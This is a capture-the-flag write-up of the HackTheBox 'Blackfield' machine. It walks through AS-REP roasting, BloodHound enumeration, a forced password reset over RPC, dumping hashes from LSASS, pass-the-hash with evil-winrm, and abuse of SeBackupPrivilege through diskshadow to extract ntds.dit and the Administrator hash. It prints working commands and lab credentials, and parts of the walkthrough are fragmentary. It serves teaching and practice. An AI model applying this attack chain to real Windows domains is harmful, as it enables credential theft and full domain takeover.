Blackfield,a Windows box created by HackTheBox user aas, It begin with finding list of folders which were username and kerbrosting the box to get a creds using which we can run bloodhound and we see that we can force change password for another uesr. by that we get access to forensic share downloading that we get
lass.dmp which contain NTLM hashes and one of them worked for svc_backup account. with that we get on the box. checking groups we see we are member of
SeBackupPrivilege using that we upload
SeBackupPrivilegeUtils and take
ntds.dit and download that and
secretdump to get Administrator hash.
# Nmap 7.80 scan initiated Sat Sep 12 13:44:29 2020 as: nmap -vv -sC -sV -Pn -oN nmap/blackfield 10.10.10.192
445 open so lets check smb
smbclient -N -L \\\\10.10.10.192
Checking SMB we see we have many share availiable
we see we can access
profiles$ share so i got everything from that share but we only see Folders which seems like usernames.
So lets create a userlist from that.
We also see rpc open so lets look for anything from that using
enum4linux which give us only
Not seeing any other thing. Lets try kerberoasting as we have usernames?
Looking at the nmap result we know the domain name as
python GetNPUsers.py BLACKFIELD.local/ -usersfile users.lst -dc-ip 10.10.10.192 -no-pass -outputfile kerbrost.out
which found a kerbroastable user as support and get us one hash to crack
And we can crack this hash using hashcat as
Looking at smb we don’t see anything new with
support user so i looked back at
bloodhound-python to dump
bloodhound-python -u support -p '#00^BlackKnight' --collectionmethod All -d blackfield.local -dc blackfield.local -gc blackfield.local -ns 10.10.10.192
and checking in bloodhound we see that support have
ForceChangePassword info we see
so using RPC we can change password for
rpcclient > setuserinfo2 audit2020 23 'P@ssw0rd'
Changing the password and smbclient to
forensic we can dump the
Checking the dump we find
lsass.zip so i used
pypykatz to look at the dmp
which give us the NT hash for
using the hash and winrm we can get a shell as
evil-winrm -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192
whoami /all we see we are member of
Privilege Name Description State
the most interesting for me was
SeBackupPrivilege as i can use this to copy files whose access i might not have.
The goal for me was to use diskshadow to create a shadow of C drive and use
NTDS.dit and save
system.hiv and use
secretdump.py to extract hashes.
Create a diskshadow
set context persistent nowriters #
diskshadow /s diskshadow.txt
SeBackupPrivilegeCmdLets module and
secretsdump.py -ntds ./loot/ntds.dit -system ./loot/system.hiv local | tee hashes.txt
which gave the Administrator hash as
184fb5e5178480be64824d4cd53b99ee using which we can winrm on the box as Administrator